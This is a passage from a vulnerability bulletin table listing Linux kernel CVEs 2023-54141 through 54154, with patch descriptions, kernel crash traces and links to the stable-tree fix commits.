| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath11k: Add missing hw_ops->get_ring_selector() for IPQ5018 During sending data after clients connected, hw_ops->get_ring_selector() will be called. But for IPQ5018, this member isn't set, and the following NULL pointer exception will occur: [ 38.840478] 8<--- cut here --- [ 38.840517] Unable to handle kernel NULL pointer dereference at virtual address 00000000 ... [ 38.923161] PC is at 0x0 [ 38.927930] LR is at ath11k_dp_tx+0x70/0x730 [ath11k] ... [ 39.063264] Process hostapd (pid: 1034, stack limit = 0x801ceb3d) [ 39.068994] Stack: (0x856a9a68 to 0x856aa000) ... [ 39.438467] [<7f323804>] (ath11k_dp_tx [ath11k]) from [<7f314e6c>] (ath11k_mac_op_tx+0x80/0x190 [ath11k]) [ 39.446607] [<7f314e6c>] (ath11k_mac_op_tx [ath11k]) from [<7f17dbe0>] (ieee80211_handle_wake_tx_queue+0x7c/0xc0 [mac80211]) [ 39.456162] [<7f17dbe0>] (ieee80211_handle_wake_tx_queue [mac80211]) from [<7f174450>] (ieee80211_probereq_get+0x584/0x704 [mac80211]) [ 39.467443] [<7f174450>] (ieee80211_probereq_get [mac80211]) from [<7f178c40>] (ieee80211_tx_prepare_skb+0x1f8/0x248 [mac80211]) [ 39.479334] [<7f178c40>] (ieee80211_tx_prepare_skb [mac80211]) from [<7f179e28>] (__ieee80211_subif_start_xmit+0x32c/0x3d4 [mac80211]) [ 39.491053] [<7f179e28>] (__ieee80211_subif_start_xmit [mac80211]) from [<7f17af08>] (ieee80211_tx_control_port+0x19c/0x288 [mac80211]) [ 39.502946] [<7f17af08>] (ieee80211_tx_control_port [mac80211]) from [<7f0fc704>] (nl80211_tx_control_port+0x174/0x1d4 [cfg80211]) [ 39.515017] [<7f0fc704>] (nl80211_tx_control_port [cfg80211]) from [<808ceac4>] (genl_rcv_msg+0x154/0x340) [ 39.526814] [<808ceac4>] (genl_rcv_msg) from [<808cdb74>] (netlink_rcv_skb+0xb8/0x11c) [ 39.536446] [<808cdb74>] (netlink_rcv_skb) from [<808ce1d0>] (genl_rcv+0x28/0x34) [ 39.544344] [<808ce1d0>] (genl_rcv) from [<808cd234>] (netlink_unicast+0x174/0x274) [ 39.551895] [<808cd234>] (netlink_unicast) from [<808cd510>] (netlink_sendmsg+0x1dc/0x440) [ 39.559362] [<808cd510>] (netlink_sendmsg) from [<808596e0>] (____sys_sendmsg+0x1a8/0x1fc) [ 39.567697] [<808596e0>] (____sys_sendmsg) from [<8085b1a8>] (___sys_sendmsg+0xa4/0xdc) [ 39.575941] [<8085b1a8>] (___sys_sendmsg) from [<8085b310>] (sys_sendmsg+0x44/0x74) [ 39.583841] [<8085b310>] (sys_sendmsg) from [<80300060>] (ret_fast_syscall+0x0/0x40) ... [ 39.620734] Code: bad PC value [ 39.625869] ---[ end trace 8aef983ad3cbc032 ]--- | 2025-12-24 | not yet calculated | CVE-2023-54141 | https://git.kernel.org/stable/c/d1992d72a359732f143cc962917104d193705da7 https://git.kernel.org/stable/c/c36289e3c5e83286974ef68c20c821fd5b63801c https://git.kernel.org/stable/c/ce282d8de71f07f0056ea319541141152c65f552 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gtp: Fix use-after-free in __gtp_encap_destroy(). syzkaller reported use-after-free in __gtp_encap_destroy(). [0] It shows the same process freed sk and touched it illegally. Commit e198987e7dd7 ("gtp: fix suspicious RCU usage") added lock_sock() and release_sock() in __gtp_encap_destroy() to protect sk->sk_user_data, but release_sock() is called after sock_put() releases the last refcnt. [0]: BUG: KASAN: slab-use-after-free in instrument_atomic_read_write include/linux/instrumented.h:96 [inline] BUG: KASAN: slab-use-after-free in atomic_try_cmpxchg_acquire include/linux/atomic/atomic-instrumented.h:541 [inline] BUG: KASAN: slab-use-after-free in queued_spin_lock include/asm-generic/qspinlock.h:111 [inline] BUG: KASAN: slab-use-after-free in do_raw_spin_lock include/linux/spinlock.h:186 [inline] BUG: KASAN: slab-use-after-free in __raw_spin_lock_bh include/linux/spinlock_api_smp.h:127 [inline] BUG: KASAN: slab-use-after-free in _raw_spin_lock_bh+0x75/0xe0 kernel/locking/spinlock.c:178 Write of size 4 at addr ffff88800dbef398 by task syz-executor.2/2401 CPU: 1 PID: 2401 Comm: syz-executor.2 Not tainted 6.4.0-rc5-01219-gfa0e21fa4443 #2 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 Call Trace: <TASK> __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x72/0xa0 lib/dump_stack.c:106 print_address_description mm/kasan/report.c:351 [inline] print_report+0xcc/0x620 mm/kasan/report.c:462 kasan_report+0xb2/0xe0 mm/kasan/report.c:572 check_region_inline mm/kasan/generic.c:181 [inline] kasan_check_range+0x39/0x1c0 mm/kasan/generic.c:187 instrument_atomic_read_write include/linux/instrumented.h:96 [inline] atomic_try_cmpxchg_acquire include/linux/atomic/atomic-instrumented.h:541 [inline] queued_spin_lock include/asm-generic/qspinlock.h:111 [inline] do_raw_spin_lock include/linux/spinlock.h:186 [inline] __raw_spin_lock_bh include/linux/spinlock_api_smp.h:127 [inline] _raw_spin_lock_bh+0x75/0xe0 kernel/locking/spinlock.c:178 spin_lock_bh include/linux/spinlock.h:355 [inline] release_sock+0x1f/0x1a0 net/core/sock.c:3526 gtp_encap_disable_sock drivers/net/gtp.c:651 [inline] gtp_encap_disable+0xb9/0x220 drivers/net/gtp.c:664 gtp_dev_uninit+0x19/0x50 drivers/net/gtp.c:728 unregister_netdevice_many_notify+0x97e/0x1520 net/core/dev.c:10841 rtnl_delete_link net/core/rtnetlink.c:3216 [inline] rtnl_dellink+0x3c0/0xb30 net/core/rtnetlink.c:3268 rtnetlink_rcv_msg+0x450/0xb10 net/core/rtnetlink.c:6423 netlink_rcv_skb+0x15d/0x450 net/netlink/af_netlink.c:2548 netlink_unicast_kernel net/netlink/af_netlink.c:1339 [inline] netlink_unicast+0x700/0x930 net/netlink/af_netlink.c:1365 netlink_sendmsg+0x91c/0xe30 net/netlink/af_netlink.c:1913 sock_sendmsg_nosec net/socket.c:724 [inline] sock_sendmsg+0x1b7/0x200 net/socket.c:747 ____sys_sendmsg+0x75a/0x990 net/socket.c:2493 ___sys_sendmsg+0x11d/0x1c0 net/socket.c:2547 __sys_sendmsg+0xfe/0x1d0 net/socket.c:2576 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3f/0x90 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x72/0xdc RIP: 0033:0x7f1168b1fe5d Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 73 9f 1b 00 f7 d8 64 89 01 48 RSP: 002b:00007f1167edccc8 EFLAGS: 00000246 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 00000000004bbf80 RCX: 00007f1168b1fe5d RDX: 0000000000000000 RSI: 00000000200002c0 RDI: 0000000000000003 RBP: 00000000004bbf80 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 R13: 000000000000000b R14: 00007f1168b80530 R15: 0000000000000000 </TASK> Allocated by task 1483: kasan_save_stack+0x22/0x50 mm/kasan/common.c:45 kasan_set_track+0x25/0x30 mm/kasan/common.c:52 __kasan_slab_alloc+0x ---truncated--- | 2025-12-24 | not yet calculated | CVE-2023-54142 | https://git.kernel.org/stable/c/d38039697184aacff1cf576e14ef583112fdefef https://git.kernel.org/stable/c/e5aa6d829831a55a693dbaeb58f8d22ba7f2b3e6 https://git.kernel.org/stable/c/9c9662e2512b5e4ee7b03108802c5222e0fa77a4 https://git.kernel.org/stable/c/bccc7ace12e69dee4684a3bb4b69737972e570d6 https://git.kernel.org/stable/c/ebd6d2077a083329110695a996c00e8ca94bc640 https://git.kernel.org/stable/c/17d6b6354f0025b7c10a56da783fd0cbb3819c5d https://git.kernel.org/stable/c/dae6095bdb24f537b4798ffd9201515b97bac94e https://git.kernel.org/stable/c/58fa341327fdb4bdf92597fd8796a9abc8d20ea3 https://git.kernel.org/stable/c/ce3aee7114c575fab32a5e9e939d4bbb3dcca79f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: mediatek: vcodec: fix resource leaks in vdec_msg_queue_init() If we encounter any error in the vdec_msg_queue_init() then we need to set "msg_queue->wdma_addr.size = 0;". Normally, this is done inside the vdec_msg_queue_deinit() function. However, if the first call to allocate &msg_queue->wdma_addr fails, then the vdec_msg_queue_deinit() function is a no-op. For that situation, just set the size to zero explicitly and return. There were two other error paths which did not clean up before returning. Change those error paths to goto mem_alloc_err. | 2025-12-24 | not yet calculated | CVE-2023-54143 | https://git.kernel.org/stable/c/858322c409e0aba8f70810d23f35c482744f007c https://git.kernel.org/stable/c/b7dbc27301f560c3b915235c53383155b3512083 https://git.kernel.org/stable/c/451dc187cadd47771e5d9434fe220fad7be84057 https://git.kernel.org/stable/c/cf10b0bb503c974ba049d6f888b21178be20a962 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: Fix kernel warning during topology setup This patch fixes the following kernel warning seen during driver load by correctly initializing the p2plink attr before creating the sysfs file: [ +0.002865] ------------[ cut here ]------------ [ +0.002327] kobject: '(null)' (0000000056260cfb): is not initialized, yet kobject_put() is being called. [ +0.004780] WARNING: CPU: 32 PID: 1006 at lib/kobject.c:718 kobject_put+0xaa/0x1c0 [ +0.001361] Call Trace: [ +0.001234] <TASK> [ +0.001067] kfd_remove_sysfs_node_entry+0x24a/0x2d0 [amdgpu] [ +0.003147] kfd_topology_update_sysfs+0x3d/0x750 [amdgpu] [ +0.002890] kfd_topology_add_device+0xbd7/0xc70 [amdgpu] [ +0.002844] ? lock_release+0x13c/0x2e0 [ +0.001936] ? smu_cmn_send_smc_msg_with_param+0x1e8/0x2d0 [amdgpu] [ +0.003313] ? amdgpu_dpm_get_mclk+0x54/0x60 [amdgpu] [ +0.002703] kgd2kfd_device_init.cold+0x39f/0x4ed [amdgpu] [ +0.002930] amdgpu_amdkfd_device_init+0x13d/0x1f0 [amdgpu] [ +0.002944] amdgpu_device_init.cold+0x1464/0x17b4 [amdgpu] [ +0.002970] ? pci_bus_read_config_word+0x43/0x80 [ +0.002380] amdgpu_driver_load_kms+0x15/0x100 [amdgpu] [ +0.002744] amdgpu_pci_probe+0x147/0x370 [amdgpu] [ +0.002522] local_pci_probe+0x40/0x80 [ +0.001896] work_for_cpu_fn+0x10/0x20 [ +0.001892] process_one_work+0x26e/0x5a0 [ +0.002029] worker_thread+0x1fd/0x3e0 [ +0.001890] ? process_one_work+0x5a0/0x5a0 [ +0.002115] kthread+0xea/0x110 [ +0.001618] ? kthread_complete_and_exit+0x20/0x20 [ +0.002422] ret_from_fork+0x1f/0x30 [ +0.001808] </TASK> [ +0.001103] irq event stamp: 59837 [ +0.001718] hardirqs last enabled at (59849): [<ffffffffb30fab12>] __up_console_sem+0x52/0x60 [ +0.004414] hardirqs last disabled at (59860): [<ffffffffb30faaf7>] __up_console_sem+0x37/0x60 [ +0.004414] softirqs last enabled at (59654): [<ffffffffb307d9c7>] irq_exit_rcu+0xd7/0x130 [ +0.004205] softirqs last disabled at (59649): [<ffffffffb307d9c7>] irq_exit_rcu+0xd7/0x130 [ +0.004203] ---[ end trace 0000000000000000 ]--- | 2025-12-24 | not yet calculated | CVE-2023-54144 | https://git.kernel.org/stable/c/2d5a6742a242091292cc0a2b607be701a45d0c4e https://git.kernel.org/stable/c/306888b1246bf44e703b6f1ccc746c2746c1a981 https://git.kernel.org/stable/c/cf97eb7e47d4671084c7e114c5d88a3d0540ecbd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: drop unnecessary user-triggerable WARN_ONCE in verifier log It's trivial for a user to trigger the "verifier log line truncated" warning, as the verifier has a fixed-sized buffer of 1024 bytes (as of now), and there are at least two pieces of user-provided information that can be output through this buffer, and both can be arbitrarily sized by the user: - BTF names; - BTF.ext source code line strings. The verifier log buffer should be properly sized for typical verifier state output. But it's sort-of expected that this buffer won't be long enough in some circumstances. So let's drop the check. In any case the code will work correctly, at worst truncating a part of a single line of output. | 2025-12-24 | not yet calculated | CVE-2023-54145 | https://git.kernel.org/stable/c/40c88c429a598006f91ad7a2b89856cd50b3a008 https://git.kernel.org/stable/c/926a175026fed5d534f587ea4ec3ec49265cd3c5 https://git.kernel.org/stable/c/cff36398bd4c7d322d424433db437f3c3391c491 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/kexec: Fix double-free of elf header buffer After b3e34a47f989 ("x86/kexec: fix memory leak of elf header buffer"), freeing image->elf_headers in the error path of crash_load_segments() is not needed because kimage_file_post_load_cleanup() will take care of that later. And not clearing it could result in a double-free. Drop the superfluous vfree() call at the error path of crash_load_segments(). | 2025-12-24 | not yet calculated | CVE-2023-54146 | https://git.kernel.org/stable/c/4c71a552b97fb4f46eb300224434fe56fcf4f254 https://git.kernel.org/stable/c/554a880a1fff46dd5a355dec21cd77d542a0ddf2 https://git.kernel.org/stable/c/fbdbf8ac333d3d47c0d9ea81d7d445654431d100 https://git.kernel.org/stable/c/5bd3c7abeb69fb4133418b846a1c6dc11313d6f0 https://git.kernel.org/stable/c/d00dd2f2645dca04cf399d8fc692f3f69b6dd996 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: platform: mtk-mdp3: Add missing check and free for ida_alloc Add the check for the return value of the ida_alloc in order to avoid NULL pointer dereference. Moreover, free allocated "ctx->id" if mdp_m2m_open fails later in order to avoid memory leak. | 2025-12-24 | not yet calculated | CVE-2023-54147 | https://git.kernel.org/stable/c/51fc1880e47421ee7b192372e8e86b7bbba40776 https://git.kernel.org/stable/c/4c173a65a2b1cc0556c3f6f0bab82e4fdb449522 https://git.kernel.org/stable/c/22b72cad501fb75500cc60af4d92de3066fb6fc2 https://git.kernel.org/stable/c/d00f592250782538cda87745607695b0fe27dcd4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: Move representor neigh cleanup to profile cleanup_tx For IP tunnel encapsulation in ECMP (Equal-Cost Multipath) mode, as the flow is duplicated to the peer eswitch, the related neighbour information on the peer uplink representor is created as well. In the cited commit, eswitch devcom unpair is moved to uplink unload API, specifically the profile->cleanup_tx. If there is an encap rule offloaded in ECMP mode, when one eswitch does unpair (because of unloading the driver, for instance), and the peer rule from the peer eswitch is going to be deleted, the use-after-free error is triggered while accessing neigh info, as it is already cleaned up in uplink's profile->disable, which is before its profile->cleanup_tx. To fix this issue, move the neigh cleanup to profile's cleanup_tx callback, and after mlx5e_cleanup_uplink_rep_tx is called. The neigh init is moved to init_tx for symmetry. [ 2453.376299] BUG: KASAN: slab-use-after-free in mlx5e_rep_neigh_entry_release+0x109/0x3a0 [mlx5_core] [ 2453.379125] Read of size 4 at addr ffff888127af9008 by task modprobe/2496 [ 2453.381542] CPU: 7 PID: 2496 Comm: modprobe Tainted: G B 6.4.0-rc7+ #15 [ 2453.383386] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014 [ 2453.384335] Call Trace: [ 2453.384625] <TASK> [ 2453.384891] dump_stack_lvl+0x33/0x50 [ 2453.385285] print_report+0xc2/0x610 [ 2453.385667] ? __virt_addr_valid+0xb1/0x130 [ 2453.386091] ? mlx5e_rep_neigh_entry_release+0x109/0x3a0 [mlx5_core] [ 2453.386757] kasan_report+0xae/0xe0 [ 2453.387123] ? mlx5e_rep_neigh_entry_release+0x109/0x3a0 [mlx5_core] [ 2453.387798] mlx5e_rep_neigh_entry_release+0x109/0x3a0 [mlx5_core] [ 2453.388465] mlx5e_rep_encap_entry_detach+0xa6/0xe0 [mlx5_core] [ 2453.389111] mlx5e_encap_dealloc+0xa7/0x100 [mlx5_core] [ 2453.389706] mlx5e_tc_tun_encap_dests_unset+0x61/0xb0 [mlx5_core] [ 2453.390361] mlx5_free_flow_attr_actions+0x11e/0x340 [mlx5_core] [ 2453.391015] ? complete_all+0x43/0xd0 [ 2453.391398] ? free_flow_post_acts+0x38/0x120 [mlx5_core] [ 2453.392004] mlx5e_tc_del_fdb_flow+0x4ae/0x690 [mlx5_core] [ 2453.392618] mlx5e_tc_del_fdb_peers_flow+0x308/0x370 [mlx5_core] [ 2453.393276] mlx5e_tc_clean_fdb_peer_flows+0xf5/0x140 [mlx5_core] [ 2453.393925] mlx5_esw_offloads_unpair+0x86/0x540 [mlx5_core] [ 2453.394546] ? mlx5_esw_offloads_set_ns_peer.isra.0+0x180/0x180 [mlx5_core] [ 2453.395268] ? down_write+0xaa/0x100 [ 2453.395652] mlx5_esw_offloads_devcom_event+0x203/0x530 [mlx5_core] [ 2453.396317] mlx5_devcom_send_event+0xbb/0x190 [mlx5_core] [ 2453.396917] mlx5_esw_offloads_devcom_cleanup+0xb0/0xd0 [mlx5_core] [ 2453.397582] mlx5e_tc_esw_cleanup+0x42/0x120 [mlx5_core] [ 2453.398182] mlx5e_rep_tc_cleanup+0x15/0x30 [mlx5_core] [ 2453.398768] mlx5e_cleanup_rep_tx+0x6c/0x80 [mlx5_core] [ 2453.399367] mlx5e_detach_netdev+0xee/0x120 [mlx5_core] [ 2453.399957] mlx5e_netdev_change_profile+0x84/0x170 [mlx5_core] [ 2453.400598] mlx5e_vport_rep_unload+0xe0/0xf0 [mlx5_core] [ 2453.403781] mlx5_eswitch_unregister_vport_reps+0x15e/0x190 [mlx5_core] [ 2453.404479] ? mlx5_eswitch_register_vport_reps+0x200/0x200 [mlx5_core] [ 2453.405170] ? up_write+0x39/0x60 [ 2453.405529] ? kernfs_remove_by_name_ns+0xb7/0xe0 [ 2453.405985] auxiliary_bus_remove+0x2e/0x40 [ 2453.406405] device_release_driver_internal+0x243/0x2d0 [ 2453.406900] ? kobject_put+0x42/0x2d0 [ 2453.407284] bus_remove_device+0x128/0x1d0 [ 2453.407687] device_del+0x240/0x550 [ 2453.408053] ? waiting_for_supplier_show+0xe0/0xe0 [ 2453.408511] ? kobject_put+0xfa/0x2d0 [ 2453.408889] ? __kmem_cache_free+0x14d/0x280 [ 2453.409310] mlx5_rescan_drivers_locked.part.0+0xcd/0x2b0 [mlx5_core] [ 2453.409973] mlx5_unregister_device+0x40/0x50 [mlx5_core] [ 2453.410561] mlx5_uninit_one+0x3d/0x110 [mlx5_core] [ 2453.411111] remove_one+0x89/0x130 [mlx5_core] [ 24 ---truncated--- | 2025-12-24 | not yet calculated | CVE-2023-54148 | https://git.kernel.org/stable/c/d628ba98eb1637acce44001e04c718d8dbb1f7ce https://git.kernel.org/stable/c/36697c592cd0809e626df01b3644c23ac522a4d0 https://git.kernel.org/stable/c/d03b6e6f31820b84f7449cca022047f36c42bc3f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: dsa: avoid suspicious RCU usage for synced VLAN-aware MAC addresses When using the felix driver (the only one which supports UC filtering and MC filtering) as a DSA master for a random other DSA switch, one can see the following stack trace when the downstream switch ports join a VLAN-aware bridge: ============================= WARNING: suspicious RCU usage ----------------------------- net/8021q/vlan_core.c:238 suspicious rcu_dereference_protected() usage! stack backtrace: Workqueue: dsa_ordered dsa_slave_switchdev_event_work Call trace: lockdep_rcu_suspicious+0x170/0x210 vlan_for_each+0x8c/0x188 dsa_slave_sync_uc+0x128/0x178 __hw_addr_sync_dev+0x138/0x158 dsa_slave_set_rx_mode+0x58/0x70 __dev_set_rx_mode+0x88/0xa8 dev_uc_add+0x74/0xa0 dsa_port_bridge_host_fdb_add+0xec/0x180 dsa_slave_switchdev_event_work+0x7c/0x1c8 process_one_work+0x290/0x568 What it's saying is that vlan_for_each() expects rtnl_lock() context and it's not getting it, when it's called from the DSA master's ndo_set_rx_mode(). The caller of that - dsa_slave_set_rx_mode() - is the slave DSA interface's dsa_port_bridge_host_fdb_add() which comes from the deferred dsa_slave_switchdev_event_work(). We went to great lengths to avoid the rtnl_lock() context in that call path in commit 0faf890fc519 ("net: dsa: drop rtnl_lock from dsa_slave_switchdev_event_work"), and calling rtnl_lock() is simply not an option due to the possibility of deadlocking when calling dsa_flush_workqueue() from the call paths that do hold rtnl_lock() - basically all of them. So, when the DSA master calls vlan_for_each() from its ndo_set_rx_mode(), the state of the 8021q driver on this device is really not protected from concurrent access by anything. Looking at net/8021q/, I don't think that vlan_info->vid_list was particularly designed with RCU traversal in mind, so introducing an RCU read-side form of vlan_for_each() - vlan_for_each_rcu() - won't be so easy, and it also wouldn't be exactly what we need anyway. In general I believe that the solution isn't in net/8021q/ anyway; vlan_for_each() is not cut out for this task. DSA doesn't need rtnl_lock() to be held per se - since it's not a netdev state change that we're blocking, but rather, just concurrent additions/removals to a VLAN list. We don't even need sleepable context - the callback of vlan_for_each() just schedules deferred work. The proposed escape is to remove the dependency on vlan_for_each() and to open-code a non-sleepable, rtnl-free alternative to that, based on copies of the VLAN list modified from .ndo_vlan_rx_add_vid() and .ndo_vlan_rx_kill_vid(). | 2025-12-24 | not yet calculated | CVE-2023-54149 | https://git.kernel.org/stable/c/3948c69b3837fec2ee5a90fbc911c343199be0ac https://git.kernel.org/stable/c/3f9e79f31e51b7d5bf95c617540deb6cf2816a3f https://git.kernel.org/stable/c/d06f925f13976ab82167c93467c70a337a0a3cda |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd: Fix an out of bounds error in BIOS parser The array is hardcoded to 8 in atomfirmware.h, but firmware provides a bigger one sometimes. Dereferencing the larger array causes an out of bounds error. commit 4fc1ba4aa589 ("drm/amd/display: fix array index out of bound error in bios parser") fixed some of this, but there are two other cases not covered by it. Fix those as well. | 2025-12-24 | not yet calculated | CVE-2023-54150 | https://git.kernel.org/stable/c/b8e7589f50b709b647b642531599e70707faf70c https://git.kernel.org/stable/c/66acfe798cd08b36cfbb65a30fab3159811304a7 https://git.kernel.org/stable/c/5675ecd2e0b00a4318ba1db1a1234e7d45b13d6b https://git.kernel.org/stable/c/dea2dbec716c38a0b73b6ad01d91e2b120cc5f1e https://git.kernel.org/stable/c/d116db180decec1b21bba31d2ff495ac4d8e1b83 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: Fix system crash due to lack of free space in LFS When f2fs tries to checkpoint during foreground gc in LFS mode, system crash occurs due to lack of free space if the amount of dirty node and dentry pages generated by data migration exceeds free space. The reproduction sequence is as follows. - 20GiB capacity block device (null_blk) - format and mount with LFS mode - create a file and write 20,000MiB - 4k random write on full range of the file RIP: 0010:new_curseg+0x48a/0x510 [f2fs] Code: 55 e7 f5 89 c0 48 0f af c3 48 8b 5d c0 48 c1 e8 20 83 c0 01 89 43 6c 48 83 c4 28 5b 41 5c 41 5d 41 5e 41 5f 5d c3 cc cc cc cc <0f> 0b f0 41 80 4f 48 04 45 85 f6 0f 84 ba fd ff ff e9 ef fe ff ff RSP: 0018:ffff977bc397b218 EFLAGS: 00010246 RAX: 00000000000027b9 RBX: 0000000000000000 RCX: 00000000000027c0 RDX: 0000000000000000 RSI: 00000000000027b9 RDI: ffff8c25ab4e74f8 RBP: ffff977bc397b268 R08: 00000000000027b9 R09: ffff8c29e4a34b40 R10: 0000000000000001 R11: ffff977bc397b0d8 R12: 0000000000000000 R13: ffff8c25b4dd81a0 R14: 0000000000000000 R15: ffff8c2f667f9000 FS: 0000000000000000(0000) GS:ffff8c344ec80000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000000c00055d000 CR3: 0000000e30810003 CR4: 00000000003706e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> allocate_segment_by_default+0x9c/0x110 [f2fs] f2fs_allocate_data_block+0x243/0xa30 [f2fs] ? __mod_lruvec_page_state+0xa0/0x150 do_write_page+0x80/0x160 [f2fs] f2fs_do_write_node_page+0x32/0x50 [f2fs] __write_node_page+0x339/0x730 [f2fs] f2fs_sync_node_pages+0x5a6/0x780 [f2fs] block_operations+0x257/0x340 [f2fs] f2fs_write_checkpoint+0x102/0x1050 [f2fs] f2fs_gc+0x27c/0x630 [f2fs] ? folio_mark_dirty+0x36/0x70 f2fs_balance_fs+0x16f/0x180 [f2fs] This patch adds checking whether free sections are enough before checkpoint during gc. [Jaegeuk Kim: code clean-up] | 2025-12-24 | not yet calculated | CVE-2023-54151 | https://git.kernel.org/stable/c/f4631d295ae3fff9e240ab78dc17f4b83d14f7bc https://git.kernel.org/stable/c/ce71c61d661cfac3f097af928995abfcebd2b8c5 https://git.kernel.org/stable/c/d11cef14f8146f3babd286c2cc8ca09c166295e2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: can: j1939: prevent deadlock by moving j1939_sk_errqueue() This commit addresses a deadlock situation that can occur in certain scenarios, such as when running data TP/ETP transfer and subscribing to the error queue while receiving a net down event. The deadlock involves locks in the following order: 3 j1939_session_list_lock -> active_session_list_lock j1939_session_activate ... j1939_sk_queue_activate_next -> sk_session_queue_lock ... j1939_xtp_rx_eoma_one 2 j1939_sk_queue_drop_all -> sk_session_queue_lock ... j1939_sk_netdev_event_netdown -> j1939_socks_lock j1939_netdev_notify 1 j1939_sk_errqueue -> j1939_socks_lock __j1939_session_cancel -> active_session_list_lock j1939_tp_rxtimer CPU0 CPU1 ---- ---- lock(&priv->active_session_list_lock); lock(&jsk->sk_session_queue_lock); lock(&priv->active_session_list_lock); lock(&priv->j1939_socks_lock); The solution implemented in this commit is to move the j1939_sk_errqueue() call out of the active_session_list_lock context, thus preventing the deadlock situation. | 2025-12-24 | not yet calculated | CVE-2023-54152 | https://git.kernel.org/stable/c/8a581b71cf686b4cd1a85c9c2dfc2fb88382c3b4 https://git.kernel.org/stable/c/ace6aa2ab5ba5869563ca689bbd912100514ae7b https://git.kernel.org/stable/c/f09ce9d765de1f064ce3919f57c6beb061744784 https://git.kernel.org/stable/c/d1366b283d94ac4537a4b3a1e8668da4df7ce7e9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: turn quotas off if mount failed after enabling quotas Yi found during a review of the patch "ext4: don't BUG on inconsistent journal feature" that when ext4_mark_recovery_complete() returns an error value, the error handling path does not turn off the enabled quotas, which triggers the following kmemleak: ================================================================ unreferenced object 0xffff8cf68678e7c0 (size 64): comm "mount", pid 746, jiffies 4294871231 (age 11.540s) hex dump (first 32 bytes): 00 90 ef 82 f6 8c ff ff 00 00 00 00 41 01 00 00 ............A... c7 00 00 00 bd 00 00 00 0a 00 00 00 48 00 00 00 ............H... backtrace: [<00000000c561ef24>] __kmem_cache_alloc_node+0x4d4/0x880 [<00000000d4e621d7>] kmalloc_trace+0x39/0x140 [<00000000837eee74>] v2_read_file_info+0x18a/0x3a0 [<0000000088f6c877>] dquot_load_quota_sb+0x2ed/0x770 [<00000000340a4782>] dquot_load_quota_inode+0xc6/0x1c0 [<0000000089a18bd5>] ext4_enable_quotas+0x17e/0x3a0 [ext4] [<000000003a0268fa>] __ext4_fill_super+0x3448/0x3910 [ext4] [<00000000b0f2a8a8>] ext4_fill_super+0x13d/0x340 [ext4] [<000000004a9489c4>] get_tree_bdev+0x1dc/0x370 [<000000006e723bf1>] ext4_get_tree+0x1d/0x30 [ext4] [<00000000c7cb663d>] vfs_get_tree+0x31/0x160 [<00000000320e1bed>] do_new_mount+0x1d5/0x480 [<00000000c074654c>] path_mount+0x22e/0xbe0 [<0000000003e97a8e>] do_mount+0x95/0xc0 [<000000002f3d3736>] __x64_sys_mount+0xc4/0x160 [<0000000027d2140c>] do_syscall_64+0x3f/0x90 ================================================================ To solve this problem, we add a "failed_mount10" tag, and call ext4_quota_off_umount() in this tag to release the enabled quotas. | 2025-12-24 | not yet calculated | CVE-2023-54153 | https://git.kernel.org/stable/c/c327b83c59ee938792a0300df646efac39c7d6a7 https://git.kernel.org/stable/c/deef86fa3005cbb61ae8aa5729324c09b3f4ba73 https://git.kernel.org/stable/c/77c3ca1108eb4a26db4f256c42b271a430cebc7d https://git.kernel.org/stable/c/d13f99632748462c32fc95d729f5e754bab06064 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: target: core: Fix target_cmd_counter leak The target_cmd_counter struct allocated via target_alloc_cmd_counter() is never freed, resulting in leaks across various transport types, e.g.: unreferenced object 0xffff88801f920120 (size 96): comm "sh", pid 102, jiffies 4294892535 (age 713.412s) hex dump (first 32 bytes): 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 38 01 92 1f 80 88 ff ff ........8....... backtrace: [<00000000e58a6252>] kmalloc_trace+0x11/0x20 [<0000000043af4b2f>] target_alloc_cmd_counter+0x17/0x90 [target_core_mod] [<000000007da2dfa7>] target_setup_session+0x2d/0x140 [target_core_mod] [<0000000068feef86>] tcm_loop_tpg_nexus_store+0x19b/0x350 [tcm_loop] [<000000006a80e021>] configfs_write_iter+0xb1/0x120 [<00000000e9f4d860>] vfs_write+0x2e4/0x3c0 [<000000008143433b>] ksys_write+0x80/0xb0 [<00000000a7df29b2>] do_syscall_64+0x42/0x90 [<0000000053f45fb8>] entry_SYSCALL_64_after_hwframe+0x6e/0xd8 Free the structure alongside the corresponding iscsit_conn / se_sess parent. | 2025-12-24 | not yet calculated | CVE-2023-54154 | https://git.kernel.org/stable/c/1cd41d1669bcbc5052afa897f85608a62ff3fb30 